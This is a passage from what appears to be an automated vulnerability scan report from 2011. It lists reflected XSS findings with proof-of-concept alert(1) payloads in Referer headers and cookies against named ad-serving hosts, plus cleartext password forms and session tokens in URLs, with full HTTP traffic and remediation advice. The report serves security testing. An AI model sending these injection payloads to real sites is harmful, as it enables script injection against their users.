var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...
2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c31'-alert(1)-'1769fa3b869 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4c31'-alert(1)-'1769fa3b869
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:32 GMT
Content-Length: 474

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.google.com/search%3Fhl=en%26q=e4c31'-alert(1)-'1769fa3b869&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...
2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfb25"-alert(1)-"75ee6a13843 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.6579760571476072 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; FFcat=305,7040,15:305,7038,15; FFad=0:0; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1c4ea';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,9:1545,8,9:826,622,14:1545,8,14:1545,8,0:0,8,14:1545,0,14:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=38:36:27:25:3:1:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236:1545,219513,220546,220547,219514,221452,228586,235518,221451|2,1#0,24:2,1#0,24:4,1#0,24:5,1#0,24:5,1#0,24:4,1#0,24:4,1#0,24:0,1#0,24:0,1#0,24:4,1#0,24;expires=Wed, 12 Oct 2011 12:49:06 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:49:06 GMT
Content-Length: 2740
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1c4ea'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1c4ea';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843';

var zzhasAd=undefined;


                                                                    var
...[SNIP]...
2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c61c"-alert(1)-"72963d88d75 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 448
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75';

var zzhasAd=undefined;


               
3. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
3.2. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...
3.3. http://www.fastcompany.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
3.4. http://www.fastcompany.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...
3.5. http://www.nowpublic.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...
4. Session token in URL  previous  next
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
4.2. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=wp.12086c39-fe96-4496-b817-e62244e98b59&hostname=www.dome9.com&location=%2F&url=http%3A%2F%2Fwww.dome9.com%2F&sessionID=1315849264587.66546&fpc=35aae75-1325eba5dcc-1493d30f-1&ts1315849265708.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:40:55 GMT
Connection: keep-alive

4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt?voxtoken=system&autoplay=false&config=%7BconfigInject%3A'true'%7D&embed_location=http%3A%2F%2Fwww.fastcompany.com%2F&feed=http%3A%2F%2Fvideo.fastcompany.com%2Fcompanies%2Fmansueto-digital%2Fvideos.rss%3Fids%3D35a3467f31b51%2C5a74966232a47%2C1bc51eb069eb1%2C29b58b01bf488%2C79b00a7ba65dd%2C273bd40607339%26append_image_to_description%3Dfalse%26verbosity%3Dlow&height=180&p=fc_playlist_homepage&width=320 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:07 GMT
Server: VoxCAST
Last-Modified: Sat, 10 Sep 2011 12:55:27 GMT
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 12:49:20 GMT
X-Cache: HIT from VoxCAST
Content-Length: 4383
Age: 3528
Content-Type: text/plain

/plugins/flowplayer.swf?config=%7B%22plugins%22%3A%7B%22bwcheck%22%3A%7B%22url%22%3A%22flowplayer.bwcheck.swf%22%2C%22serverType%22%3A%22fms%22%2C%22netConnectionUrl%22%3A%22rtmp%3A%2F%2Ffms.0367.edge
...[SNIP]...
4.4. http://video.fastcompany.com/plugins/flowplayer.swf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /plugins/flowplayer.swf

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/flowplayer.swf?voxtoken=system&embed_domain=www.fastcompany.com HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:09 GMT
Server: VoxCAST
Last-Modified: Thu, 25 Aug 2011 01:47:01 GMT
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 13:47:36 GMT
Accept-Ranges: bytes
Content-Length: 123292
Age: 33
X-Cache: HIT from VoxCAST
Content-Type: application/x-shockwave-flash

CWS
~...x..}.`[....O..iK.....,..I....cK......@.gYz.DdI.I...H...R6..Zf[.t1
tA.%.._.._.-...=.....{..,.~'O..s....{...M
......A./
.... \..]".'......xdr"_.:.w..l.R.........l.P,.o.t.I'ml..q.....^.*T.......
...[SNIP]...
4.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
